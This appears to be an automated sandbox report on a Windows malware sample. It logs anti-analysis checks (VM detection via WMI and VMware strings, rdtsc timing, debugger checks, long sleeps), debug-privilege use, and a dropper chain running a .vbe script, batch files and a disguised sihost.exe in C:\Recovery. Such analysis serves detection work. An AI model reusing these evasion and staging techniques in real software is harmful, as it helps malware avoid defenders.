Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Memory allocated: 7F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Memory allocated: 1A5A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Memory allocated: 16E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Memory allocated: 1B090000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Memory allocated: 10C0000 memory reserve \| memory write watch
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Memory allocated: 1AE30000 memory reserve \| memory write watch
Source: C:\Recovery\sihost.exe	Memory allocated: A40000 memory reserve \| memory write watch
Source: C:\Recovery\sihost.exe	Memory allocated: 1A640000 memory reserve \| memory write watch
Source: C:\Recovery\sihost.exe	Memory allocated: 1050000 memory reserve \| memory write watch
Source: C:\Recovery\sihost.exe	Memory allocated: 1690000 memory reserve \| memory write watch
Source: C:\Recovery\sihost.exe	Memory allocated: 3040000 memory reserve \| memory write watch
Source: C:\Recovery\sihost.exe	Memory allocated: 1B200000 memory reserve \| memory write watch

Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe

Code function: 20_2_00007FFD9BA8A855 rdtsc

20_2_00007FFD9BA8A855

Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 3600000	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 599859	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 599749	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 599625	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 599476	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 599364	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 598249	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 598011	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 597884	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 597750	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 597625	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 597498	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 597368	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 597172	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 596290	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 596171	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 596062	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 595942	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 595593	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 595484	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 595374	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 595261	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 595140	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\sihost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\sihost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\sihost.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Window / User API: threadDelayed 1576	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Window / User API: threadDelayed 806	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Window / User API: threadDelayed 3754	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Window / User API: threadDelayed 5887	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Window / User API: threadDelayed 367
Source: C:\Recovery\sihost.exe	Window / User API: threadDelayed 365
Source: C:\Recovery\sihost.exe	Window / User API: threadDelayed 380
Source: C:\Recovery\sihost.exe	Window / User API: threadDelayed 904

Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe TID: 4308	Thread sleep count: 1576 > 30	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe TID: 1868	Thread sleep count: 806 > 30	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe TID: 7124	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe TID: 7432	Thread sleep time: -14757395258967632s >= -30000s	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe TID: 7432	Thread sleep time: -3600000s >= -30000s	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe TID: 7432	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe TID: 7432	Thread sleep time: -599859s >= -30000s	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe TID: 7432	Thread sleep time: -599749s >= -30000s	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe TID: 7432	Thread sleep time: -599625s >= -30000s	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe TID: 7432	Thread sleep time: -599476s >= -30000s	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe TID: 7432	Thread sleep time: -599364s >= -30000s	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe TID: 7432	Thread sleep time: -599234s >= -30000s	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe TID: 7432	Thread sleep time: -599125s >= -30000s	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe TID: 7432	Thread sleep time: -599015s >= -30000s	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe TID: 7432	Thread sleep time: -598906s >= -30000s	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe TID: 7432	Thread sleep time: -598797s >= -30000s	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe TID: 7432	Thread sleep time: -598687s >= -30000s	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe TID: 7432	Thread sleep time: -598578s >= -30000s	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe TID: 7432	Thread sleep time: -598468s >= -30000s	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe TID: 7432	Thread sleep time: -598359s >= -30000s	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe TID: 7432	Thread sleep time: -598249s >= -30000s	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe TID: 7432	Thread sleep time: -598140s >= -30000s	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe TID: 7432	Thread sleep time: -598011s >= -30000s	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe TID: 7432	Thread sleep time: -597884s >= -30000s	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe TID: 7432	Thread sleep time: -597750s >= -30000s	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe TID: 7432	Thread sleep time: -597625s >= -30000s	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe TID: 7432	Thread sleep time: -597498s >= -30000s	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe TID: 7432	Thread sleep time: -597368s >= -30000s	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe TID: 7432	Thread sleep time: -597172s >= -30000s	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe TID: 7432	Thread sleep time: -597031s >= -30000s	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe TID: 7432	Thread sleep time: -596290s >= -30000s	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe TID: 7432	Thread sleep time: -596171s >= -30000s	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe TID: 7432	Thread sleep time: -596062s >= -30000s	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe TID: 7432	Thread sleep time: -595942s >= -30000s	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe TID: 7432	Thread sleep time: -595812s >= -30000s	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe TID: 7432	Thread sleep time: -595703s >= -30000s	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe TID: 7432	Thread sleep time: -595593s >= -30000s	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe TID: 7432	Thread sleep time: -595484s >= -30000s	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe TID: 7432	Thread sleep time: -595374s >= -30000s	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe TID: 7432	Thread sleep time: -595261s >= -30000s	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe TID: 7432	Thread sleep time: -595140s >= -30000s	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe TID: 4488	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\sihost.exe TID: 2084	Thread sleep count: 365 > 30
Source: C:\Recovery\sihost.exe TID: 1436	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\sihost.exe TID: 7204	Thread sleep count: 380 > 30
Source: C:\Recovery\sihost.exe TID: 1352	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\sihost.exe TID: 7408	Thread sleep count: 904 > 30
Source: C:\Recovery\sihost.exe TID: 7416	Thread sleep count: 123 > 30
Source: C:\Recovery\sihost.exe TID: 7384	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\sihost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\sihost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\sihost.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Code function: 0_2_00B7A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,		0_2_00B7A5F4
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Code function: 0_2_00B8B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,		0_2_00B8B8E0

Source: C:\Users\user\Desktop\hK8z1AmKO1.exe

Code function: 0_2_00B8DD72 VirtualQuery,GetSystemInfo,

0_2_00B8DD72

Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 3600000	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 599859	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 599749	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 599625	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 599476	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 599364	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 598249	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 598011	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 597884	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 597750	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 597625	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 597498	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 597368	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 597172	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 596290	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 596171	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 596062	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 595942	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 595593	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 595484	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 595374	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 595261	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 595140	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\sihost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\sihost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\sihost.exe	Thread delayed: delay time: 922337203685477

Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: hK8z1AmKO1.exe, 00000000.00000003.1664981870.0000000000892000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: hK8z1AmKO1.exe, 00000000.00000003.1664497378.0000000000892000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2930698377.000000001C395000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\|
Source: providerwebmonitor.exe, 00000004.00000002.1718053470.000000001B7CB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\tp
Source: w32tm.exe, 00000013.00000002.1761264309.000002631B179000.00000004.00000020.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2930698377.000000001C395000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\hK8z1AmKO1.exe

API call chain: ExitProcess graph end node

graph_0-24527

Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe

Code function: 20_2_00007FFD9BA8A855 rdtsc

20_2_00007FFD9BA8A855

Source: C:\Users\user\Desktop\hK8z1AmKO1.exe

Code function: 0_2_00B9866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00B9866F

Source: C:\Users\user\Desktop\hK8z1AmKO1.exe

Code function: 0_2_00B9753D mov eax, dword ptr fs:[00000030h]

0_2_00B9753D

Source: C:\Users\user\Desktop\hK8z1AmKO1.exe

Code function: 0_2_00B9B710 GetProcessHeap,

0_2_00B9B710

Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process token adjusted: Debug
Source: C:\Recovery\sihost.exe	Process token adjusted: Debug
Source: C:\Recovery\sihost.exe	Process token adjusted: Debug
Source: C:\Recovery\sihost.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Code function: 0_2_00B8F063 SetUnhandledExceptionFilter,	0_2_00B8F063
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Code function: 0_2_00B8F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00B8F22B
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Code function: 0_2_00B9866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00B9866F
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Code function: 0_2_00B8EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00B8EF05

Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\PortsavesPerfdhcpsvc\jTMUiy4UT3fzJ0p29vviWqbG.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\PortsavesPerfdhcpsvc\oSG0DtwH58jESdPiWbQWqH7Kb5.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe "C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe"	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\sSMyRm55ZX.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\sihost.exe "C:\Recovery\sihost.exe"	Jump to behavior
